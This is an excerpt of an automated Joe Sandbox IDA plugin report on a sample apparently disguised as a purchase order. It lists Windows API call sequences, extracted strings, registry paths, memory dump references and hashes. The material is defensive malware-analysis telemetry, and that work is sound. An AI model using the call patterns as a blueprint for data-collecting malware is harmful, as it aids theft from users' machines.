                                                                                                      • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                                      • GetWindow.USER32(00000000), ref: 00405F80
                                                                                                        • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                                      • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                                      • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                                      • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                                      • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                                      • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$ItemMessageRectSend$Client
                                                                                                      • String ID:
                                                                                                      • API String ID: 2047574939-0
                                                                                                      • Opcode ID: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                                                                                      • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                                                      • Opcode Fuzzy Hash: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                                                                                      • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                                                      APIs
                                                                                                      • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                                                      • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                                                      • GetTickCount.KERNEL32 ref: 0041887D
                                                                                                      • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                                                      • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                      • String ID:
                                                                                                      • API String ID: 4218492932-0
                                                                                                      • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                      • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                                      • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                      • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                                      APIs
                                                                                                        • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                        • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                        • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                        • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                      • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                                                      • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                                                      • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                                        • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                                        • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                                                      • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                                                      • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                                                      • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$memset
                                                                                                      • String ID: gj
                                                                                                      • API String ID: 438689982-4203073231
                                                                                                      • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                      • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                                      • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                      • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                                      APIs
                                                                                                      • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy
                                                                                                      • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                                      • API String ID: 3510742995-2446657581
                                                                                                      • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                      • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                                                      • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                      • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                                                      APIs
                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                                      • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                                      • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                                      • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                                      • memset.MSVCRT ref: 00405ABB
                                                                                                      • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                                      • SetFocus.USER32(?), ref: 00405B76
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$FocusItemmemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 4281309102-0
                                                                                                      • Opcode ID: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                                                                                      • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                                                      • Opcode Fuzzy Hash: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                                                                                      • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _snwprintfwcscat
                                                                                                      • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                      • API String ID: 384018552-4153097237
                                                                                                      • Opcode ID: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                                                                                      • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                                                      • Opcode Fuzzy Hash: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                                                                                      • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                      • String ID: 0$6
                                                                                                      • API String ID: 2029023288-3849865405
                                                                                                      • Opcode ID: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                                                                                      • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                                      • Opcode Fuzzy Hash: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                                                                                      • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                                      APIs
                                                                                                        • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                      • memset.MSVCRT ref: 00405455
                                                                                                      • memset.MSVCRT ref: 0040546C
                                                                                                      • memset.MSVCRT ref: 00405483
                                                                                                      • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                                      • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$memcpy$ErrorLast
                                                                                                      • String ID: 6$\
                                                                                                      • API String ID: 404372293-1284684873
                                                                                                      • Opcode ID: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                                                                                      • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                                      • Opcode Fuzzy Hash: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                                                                                      • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                                      APIs
                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                      • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                      • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                      • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                      • wcscat.MSVCRT ref: 0040A0E6
                                                                                                      • wcscat.MSVCRT ref: 0040A0F5
                                                                                                      • wcscpy.MSVCRT ref: 0040A107
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                      • String ID:
                                                                                                      • API String ID: 1331804452-0
                                                                                                      • Opcode ID: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                                                                                      • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                                      • Opcode Fuzzy Hash: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                                                                                      • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                      • String ID: advapi32.dll
                                                                                                      • API String ID: 2012295524-4050573280
                                                                                                      • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                                      • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                                      • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                                      • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                      • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                      • <%s>, xrefs: 004100A6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$_snwprintf
                                                                                                      • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                      • API String ID: 3473751417-2880344631
                                                                                                      • Opcode ID: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                                                                                      • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                      • Opcode Fuzzy Hash: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                                                                                      • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: wcscat$_snwprintfmemset
                                                                                                      • String ID: %2.2X
                                                                                                      • API String ID: 2521778956-791839006
                                                                                                      • Opcode ID: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                                                                                      • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                      • Opcode Fuzzy Hash: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                                                                                      • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _snwprintfwcscpy
                                                                                                      • String ID: dialog_%d$general$menu_%d$strings
                                                                                                      • API String ID: 999028693-502967061
                                                                                                      • Opcode ID: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                                                                                      • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                                      • Opcode Fuzzy Hash: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                                                                                      • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                                      APIs
                                                                                                      • strlen.MSVCRT ref: 00408DFA
                                                                                                        • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                                                                      • memset.MSVCRT ref: 00408E46
                                                                                                      • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                                                                      • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                                                                      • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$memsetstrlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 2350177629-0
                                                                                                      • Opcode ID: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                                                                                      • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                                                      • Opcode Fuzzy Hash: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                                                                                      • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset
                                                                                                      • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                      • API String ID: 2221118986-1606337402
                                                                                                      • Opcode ID: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                                                                                      • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                                                      • Opcode Fuzzy Hash: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                                                                                      • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                                                                      APIs
                                                                                                      • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                                                                                      • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,?,?,00000010,?,00000000,?,00000001), ref: 00408FB3
                                                                                                      • memset.MSVCRT ref: 00408FD4
                                                                                                      • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,00000010,?,00000000,?,00000001), ref: 00409025
                                                                                                      • memset.MSVCRT ref: 00409042
                                                                                                      • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                                                                                        • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 265355444-0
                                                                                                      • Opcode ID: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                                                                                                      • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                                                                      • Opcode Fuzzy Hash: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                                                                                                      • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                        • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                        • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                                      • memset.MSVCRT ref: 0040C439
                                                                                                      • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                      • _wcsupr.MSVCRT ref: 0040C481
